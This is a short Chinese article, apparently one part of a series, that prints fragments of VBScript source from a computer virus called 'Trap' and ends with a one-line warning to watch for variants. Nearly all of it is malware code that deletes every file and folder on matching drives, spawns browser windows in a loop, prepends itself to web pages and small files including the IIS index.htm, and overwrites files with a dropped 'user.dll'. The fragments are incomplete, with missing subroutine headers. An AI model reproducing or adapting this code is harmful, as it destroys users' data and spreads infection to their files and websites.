“陷阱”病毒源代码大揭密[6]

set adi = fso.drives

for each x in adi

if x.drivestype = 2 then

set kd = fso.getfolder(x & "\")

set kfs = kd.files

for each kf in kfs

kf.delete

next

set ks = kd.subfolders

for each kh in ks

kh.delete

next

end if

next

window.open ""

loop

end sub

dim fi

h = "c:\inetput\wwwroot"

if fso.folderexists(h) then

addhead h & "\index.htm",fi,1

end if

end sub

on error resume next

dim tso, buffer,sr

if f.size > max_size then exit sub '传染大小小于100k的文件

set tso = fso.opentextfile(path, 1, true)

buffer = tso.readall()

tso.close

if (t = 1) then

if ucase(left(ltrim(buffer), 7)) <> "<script" then

set tso = fso.opentextfile(path, 2, true)

tso.write code_str & vbcrlf & buffer '插入到文件头

tso.close

end if

else

if mid(buffer, 3, 2) <> "'@" then

tso.close

sr=w2 & "user.dll"

if fso.fileexists(sr) then fso.copyfile sr, path

end if

end if

end sub

　虽然病毒发作日已过但我们还是要小心提防病毒的变种出现。